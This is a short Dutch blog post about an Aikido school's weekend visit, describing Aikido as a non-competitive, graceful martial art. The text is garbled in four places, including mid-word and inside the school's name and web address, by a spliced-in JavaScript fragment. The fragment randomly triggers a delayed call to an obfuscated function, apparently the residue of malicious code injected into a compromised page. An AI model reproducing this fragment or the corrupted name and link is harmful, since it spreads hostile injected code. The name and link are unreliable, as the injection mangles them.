Tuesday, January 25, 2022

Aikido

Op zaterdag en zondag is Aikidoschool Niek Zandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andee te gast.

Aikido is niet alleen een moderne manier van zelfverdediging, maar bevat ook vele andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere aspecten. Bijvoorbeeld het onderzoeken van je persoonlijkheid, trainen en soepel houden van lichaam en geest, ademhalingsoefeningen. De ontwikkelingen zijn direct toepasbaar in het dagelijks leven. Er is geen competitie element, dus ook geen wedstrijden. Hierdoor is het mogelijk dat iedereen op zijn eigen niveau met elkaar oefent.

Kenmerkend zijn de vloeiende, cirkelvormige bewegingen vanuit een stabiel en rustig centrum. Hierdoor krijgt het geheel een gracieus aanzicht. De technieken zijn echter uiterst effectief. Doordat er geen wedstrijdelement aanwezig is, zijn ernstige blessures zeldzaam.

Voorop staat de veiligheid en het plezier van het samen oefenen.

Voor meer informatie kijk op andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andee.nl”>www.niekzandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andee.nl